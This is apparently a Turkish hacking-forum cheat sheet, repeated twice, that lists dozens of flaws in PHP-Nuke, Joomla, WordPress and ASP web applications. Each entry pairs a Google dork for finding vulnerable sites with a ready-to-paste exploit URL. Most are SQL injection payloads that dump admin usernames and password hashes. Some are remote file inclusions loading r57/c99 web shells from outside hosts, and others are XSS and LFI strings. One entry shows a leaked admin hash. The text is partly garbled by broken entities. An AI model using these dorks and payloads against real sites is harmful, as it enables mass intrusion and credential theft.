+
----
-PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : amp;amp;name Kose_Yazilari op viewarticle artidamp;amp;
Google arama : amp;amp;name Kose_Yazilari op printpage artidamp;amp;
Site sonuna : modules.php?name=nbsp;nbsp;KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name=nbsp;KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: nbsp;inurl:/plugins/wordtubenbsp;
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Htmlamp;den sonrasına kendi shell adresiniz gerekli.
Joomlanbsp; Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did= 99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,5,username,char(32,1 12,97,115,115,119,111,114,100,5,password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=7...m3na_authors--
USER
http://www.xxx.com/news.php?newsid=7...m3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: nbsp;com_actualitenbsp;
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:nbsp;/com_mtree/nbsp;
Site sonuna : http://[target]/[mambo_path]...g_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : https://tik.lat/yiwrB
Com-Lmo Açığı
Google Arama : nbsp;com_lmonbsp;
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path.nbsp;/administ rator/components/com_lmo/nbsp;;
$lmo_url=$mosConfig_live_site.nbsp;/administrator/comp onents/com_lmo/nbsp;;
Com-PonyGallery Açığı
Google Arama : inurl:nbsp;index.php?option=com_ponygallerynbsp;
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=v ie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,5,username,ch ar(32,112,97,115,115,119,111,114,100,5,password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view& id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,5,username,char(32,11 2,97,115,115,119,111,114,100,5,password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:nbsp;/index.php?option=com_rsfilesnbsp;
Site sonuna : //index.php?option=com_rsfiles&task=files.display& pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display& pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,5,username, char(32,112,97,115,115,119,111,114,100,5,passwor d),777,666,555,444,333,222,111%20from%20jos_users/ *
Com-Joomlaradiov5
Google Arama : inurl:nbsp;com_joomlaradiov5nbsp;
Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : nbsp;com_joomlaflashfunnbsp;
Site Sonuna : https://tik.lat/vrFcV
Carousel Flash Image Açığı
Google Arama : inurl:nbsp;com_jjgallery
Site Sonuna : http://[Taget]/[Path]/admini.../shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2, 3,4,5,concat(char(117,115,101,114,110,97,109,1 01,5,username,char(32,112,97,115,115,119,111,114 ,100,5,password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Açığı
Dork: nbsp;Powered by Kmita Tell Friendnbsp; veya nbsp;allinurl:/kmitat/nbsp;
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attack er.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : nbsp;allinurl:viewfaqs.php?cat=nbsp;
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: nbsp;allinurl:index.php?user=daysbookingnbsp;
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : nbsp;BlogMe PHP created by Gamma Scriptsnbsp;
Exploit : https://tik.lat/tQQcQ UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
veya
https://tik.lat/338AV UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid amp;amp;catidamp;amp;
Dork 2 - content_by_cat.asp? amp;amp;catidamp;amp;
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1amp; UNION SELECT TOP 1 convert(int, password%2bamp;%20xamp
FROM EMAGIC_LOGINS where username=nbsp;amp;saamp;--
vlBook 1.21 Script Açığı
Script Download : http://home.vlab.info/vlbook_1.21.zip
DORK : nbsp;Powered by vlBook 1.21nbsp;
XSS Address : http://example/?l=nbsp; ********>alert(amp;xssamp/script>
LFI Address : https://tik.lat/YBiGZ NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:nbsp;modules.php?namenbsp;print
DORK 2 : allinurl:nbsp;modules.php?name=nbsp;Hikayenbsp;
DORK 3: allinurl:nbsp;modules.php?name=nbsp;Fikralarnbsp;
DORK 4: allinurl:nbsp;modules.php?name=nbsp;bilginbsp;
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,ai d,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%2 01%200%202
Com_JoomlaFlashfun Açığı
Dork: nbsp;com_joomlaflashfunnbsp;
Example:
https://tik.lat/OE2Bz
Powered By The Black Lily 2007 Açığı
Dork : nbsp;Powered By The Black Lily 2007nbsp;
EXPLOIT:
http://victim.com/ar/products.php?cl...username%20fro m%20admin/*
veya
http://victim.com/en/products.php?cl...username%20fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
https://tik.lat/ZRZ7i
Rmsoft GS 2.0 Açığı
Dork: intext
owered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/ all/**/select/**/1,1,concat(database(),0x202D20,us er()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:nbsp;com_na_contentnbsp;
DORK 2 : allinurl:nbsp;com_na_biblenbsp;
DORK 3 : allinurl:nbsp;com_na_eventsnbsp;
DORK 4 : allinurl:nbsp;com_na_contentnbsp;
DORK 5 : allinurl:nbsp;com_na_feedbacknbsp;
DORK 6 : allinurl:nbsp;com_na_mydocsnbsp;
DORK 7 : allinurl:nbsp;com_na_churchmapnbsp;
DORK 8 : allinurl:nbsp;com_na_bibleinfonbsp;
DORK 9 : allinurl:nbsp;com_na_dbsnbsp;
DORK 10 : allinurl:nbsp;com_na_udmnbsp;
DORK 11 : allinurl:nbsp;com_na_qformsnbsp;
DORK 12 : allinurl:nbsp;com_na_gallery2nbsp;
DORK 13 : allinurl:nbsp;com_na_publicrssnbsp;
DORK 14 : allinurl:nbsp;index.php?kwdnbsp;
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/conc at(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: nbsp;Review Scriptnbsp;, nbsp;Phil Taylornbsp;
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:nbsp;index.php?option=com_portfolionbsp;
Exploit:
http://site.com/index.php?option=com...rId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: nbsp;com_astatspronbsp;
PoC: administrator/components/com_astatspro/refer.php?i d=-1/**/union/**/select/**/0,concat(username,0x3a,pas sword,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/ **/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
H1>302 Moved/H1>
The ******** has moved A HREF=nbsp;admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administratornbsp;>here/A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : nbsp;Powered by phpBB © 2001, 2006 phpBB Groupnbsp; veya nbsp;Modified by Fully Modded phpBB © 2002, 2006nbsp;
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(5,usernam e,char(5,user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: nbsp;Easy-Clanpage v2.2nbsp;
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,p assword),4,5,6,7/**/from/**/ecp_user/**/where/**/u serid=1/*
BM Classifieds Açığı
Dork 1 : amp;amp;showad.php?listingid=amp;amp;
Dork 2 : amp;amp;pfriendly.php?ad=amp;amp;
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email), password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : amp;amp; webboard question.asp QIDamp;amp;
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20amp;;amp;;
Com-Noticias Açığı
DorK : amp;amp;com_noticiasamp;amp;
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(usern ame,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork - amp;amp;links.asp?CatIdamp;amp;
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
http://www.xxx.com/path/login.asp?re...Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :nbsp;modules/visonbsp;
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x 3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_a dmin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x 3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20e xv2_admin%201
Bookmarkx Script Açığı
DorK 1 : nbsp;2007 BookmarkX scriptnbsp;
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :nbsp;index.php?menu=showtopicnbsp;
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x 3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x 3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile & user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile & user=1/**/and/**/mid((select/**/password/**/from/* */jos_users/**/limit/**/0,1),1,1)/**//**/Char(97)/ *
----
-PHP-Nuke (Kose_Yazilari) Açığı
Google Arama : amp;amp;name Kose_Yazilari op viewarticle artidamp;amp;
Google arama : amp;amp;name Kose_Yazilari op printpage artidamp;amp;
Site sonuna : modules.php?name=nbsp;nbsp;KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors
modules.php?name=nbsp;KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors
WorldTube Açığı
Google Arama: nbsp;inurl:/plugins/wordtubenbsp;
Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?
Not: Htmlamp;den sonrasına kendi shell adresiniz gerekli.
Joomlanbsp; Component EventList Açığı
Google Arama : intext: Event List 0.8 Alpha by schlu.net
Site Sonuna : //index.php?option=com_eventlist&func=details&did= 99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,5,username,char(32,1 12,97,115,115,119,111,114,100,5,password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
Powered By 6rbScript Açığı
Google Arama : Powered by 6rbScript
Site Sonuna
PWD
http://www.xxx.com/news.php?newsid=7...m3na_authors--
USER
http://www.xxx.com/news.php?newsid=7...m3na_authors--
Com-Actualite Açığı
Google Arama : allinurl: nbsp;com_actualitenbsp;
Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*
Com-Mtree Açığı
Google Arama : inurl:nbsp;/com_mtree/nbsp;
Site sonuna : http://[target]/[mambo_path]...g_absolute_pat h=
Webring Component (component_dir) Açığı
Google Arama: inurl:com_webring
Site Sonuna : https://tik.lat/yiwrB
Com-Lmo Açığı
Google Arama : nbsp;com_lmonbsp;
Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path.nbsp;/administ rator/components/com_lmo/nbsp;;
$lmo_url=$mosConfig_live_site.nbsp;/administrator/comp onents/com_lmo/nbsp;;
Com-PonyGallery Açığı
Google Arama : inurl:nbsp;index.php?option=com_ponygallerynbsp;
Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=v ie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,5,username,ch ar(32,112,97,115,115,119,111,114,100,5,password) ,5,0,0%20from%20jos_users/*
Com-NeoRecruit Açığı
Google Arama : inurl:index.php?option=com_NeoRecruit
Site Sonuna : //index.php?option=com_neorecruit&task=offer_view& id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,5,username,char(32,11 2,97,115,115,119,111,114,100,5,password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*
Com-Rsfiles Açığı
Google Arama : inurl:nbsp;/index.php?option=com_rsfilesnbsp;
Site sonuna : //index.php?option=com_rsfiles&task=files.display& pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display& pa th=
Com-Nicetalk Açığı
Google Arama : inurl:index.php?option=com_nicetalk
Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,5,username, char(32,112,97,115,115,119,111,114,100,5,passwor d),777,666,555,444,333,222,111%20from%20jos_users/ *
Com-Joomlaradiov5
Google Arama : inurl:nbsp;com_joomlaradiov5nbsp;
Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?
Com-JoomlaFlashFun Açığı
Google Arama : nbsp;com_joomlaflashfunnbsp;
Site Sonuna : https://tik.lat/vrFcV
Carousel Flash Image Açığı
Google Arama : inurl:nbsp;com_jjgallery
Site Sonuna : http://[Taget]/[Path]/admini.../shelz/r57.txt ?
Com-Mambads Açığı
Google Arama : inurl:com_mambads
Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2, 3,4,5,concat(char(117,115,101,114,110,97,109,1 01,5,username,char(32,112,97,115,115,119,111,114 ,100,5,password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*
Kmita Tell Friend Açığı
Dork: nbsp;Powered by Kmita Tell Friendnbsp; veya nbsp;allinurl:/kmitat/nbsp;
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attack er.com/evil?
Yöntemi: Shell
Panele yönlendirir.
View-FAQ Açığı
Dork: Google : nbsp;allinurl:viewfaqs.php?cat=nbsp;
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Days-Booking Açığı
Dork: nbsp;allinurl:index.php?user=daysbookingnbsp;
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
Gamma Scripts Açığı
Dork : nbsp;BlogMe PHP created by Gamma Scriptsnbsp;
Exploit : https://tik.lat/tQQcQ UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--
veya
https://tik.lat/338AV UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
ASPapp KnowledgeBase Açığı
Dork 1 - content_by_cat.asp?contentid amp;amp;catidamp;amp;
Dork 2 - content_by_cat.asp? amp;amp;catidamp;amp;
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1amp; UNION SELECT TOP 1 convert(int, password%2bamp;%20xamp
FROM EMAGIC_LOGINS where username=nbsp;amp;saamp;--vlBook 1.21 Script Açığı
Script Download : http://home.vlab.info/vlbook_1.21.zip
DORK : nbsp;Powered by vlBook 1.21nbsp;
XSS Address : http://example/?l=nbsp; ********>alert(amp;xssamp
/script>LFI Address : https://tik.lat/YBiGZ NAME]%00
PHP-Nuke Siir Açığı
DORK 1 : allinurl:nbsp;modules.php?namenbsp;print
DORK 2 : allinurl:nbsp;modules.php?name=nbsp;Hikayenbsp;
DORK 3: allinurl:nbsp;modules.php?name=nbsp;Fikralarnbsp;
DORK 4: allinurl:nbsp;modules.php?name=nbsp;bilginbsp;
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,ai d,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%2 01%200%202
Com_JoomlaFlashfun Açığı
Dork: nbsp;com_joomlaflashfunnbsp;
Example:
https://tik.lat/OE2Bz
Powered By The Black Lily 2007 Açığı
Dork : nbsp;Powered By The Black Lily 2007nbsp;
EXPLOIT:
http://victim.com/ar/products.php?cl...username%20fro m%20admin/*
veya
http://victim.com/en/products.php?cl...username%20fro m%20admin/*
JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
https://tik.lat/ZRZ7i
Rmsoft GS 2.0 Açığı
Dork: intext
owered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.phpExploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/ all/**/select/**/1,1,concat(database(),0x202D20,us er()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
Com-Na-Xxx Açığı
DORK 1 : allinurl:nbsp;com_na_contentnbsp;
DORK 2 : allinurl:nbsp;com_na_biblenbsp;
DORK 3 : allinurl:nbsp;com_na_eventsnbsp;
DORK 4 : allinurl:nbsp;com_na_contentnbsp;
DORK 5 : allinurl:nbsp;com_na_feedbacknbsp;
DORK 6 : allinurl:nbsp;com_na_mydocsnbsp;
DORK 7 : allinurl:nbsp;com_na_churchmapnbsp;
DORK 8 : allinurl:nbsp;com_na_bibleinfonbsp;
DORK 9 : allinurl:nbsp;com_na_dbsnbsp;
DORK 10 : allinurl:nbsp;com_na_udmnbsp;
DORK 11 : allinurl:nbsp;com_na_qformsnbsp;
DORK 12 : allinurl:nbsp;com_na_gallery2nbsp;
DORK 13 : allinurl:nbsp;com_na_publicrssnbsp;
DORK 14 : allinurl:nbsp;index.php?kwdnbsp;
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/conc at(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Com-Comments Açığı
Dork: nbsp;Review Scriptnbsp;, nbsp;Phil Taylornbsp;
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
Portfolio Manager 1.0 Açığı
Dork: inurl:nbsp;index.php?option=com_portfolionbsp;
Exploit:
http://site.com/index.php?option=com...rId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
Com-Astatspro Açığı
Dork: allinurl: nbsp;com_astatspronbsp;
PoC: administrator/components/com_astatspro/refer.php?i d=-1/**/union/**/select/**/0,concat(username,0x3a,pas sword,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/ **/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
H1>302 Moved/H1>
The ******** has moved A HREF=nbsp;admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administratornbsp;>here/A>.
Bu bölümde md5 saklıdır.
Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : nbsp;Powered by phpBB © 2001, 2006 phpBB Groupnbsp; veya nbsp;Modified by Fully Modded phpBB © 2002, 2006nbsp;
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(5,usernam e,char(5,user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
Easy-Clanpage v2.2 Açığı
Dork: nbsp;Easy-Clanpage v2.2nbsp;
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,p assword),4,5,6,7/**/from/**/ecp_user/**/where/**/u serid=1/*
BM Classifieds Açığı
Dork 1 : amp;amp;showad.php?listingid=amp;amp;
Dork 2 : amp;amp;pfriendly.php?ad=amp;amp;
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email), password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Porar WebBoart Açığı
DorK : amp;amp; webboard question.asp QIDamp;amp;
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20amp;;amp;;
Com-Noticias Açığı
DorK : amp;amp;com_noticiasamp;amp;
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(usern ame,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
ASPapp -links.asp Açığı
dork - amp;amp;links.asp?CatIdamp;amp;
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
http://www.xxx.com/path/login.asp?re...Fadmin%2Easp%3 F
Modules-Viso Açığı
DORKS 1 : allinurl :nbsp;modules/visonbsp;
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x 3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_a dmin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x 3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20e xv2_admin%201
Bookmarkx Script Açığı
DorK 1 : nbsp;2007 BookmarkX scriptnbsp;
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :nbsp;index.php?menu=showtopicnbsp;
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x 3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x 3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile & user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile & user=1/**/and/**/mid((select/**/password/**/from/* */jos_users/**/limit/**/0,1),1,1)/**//**/Char(97)/ *
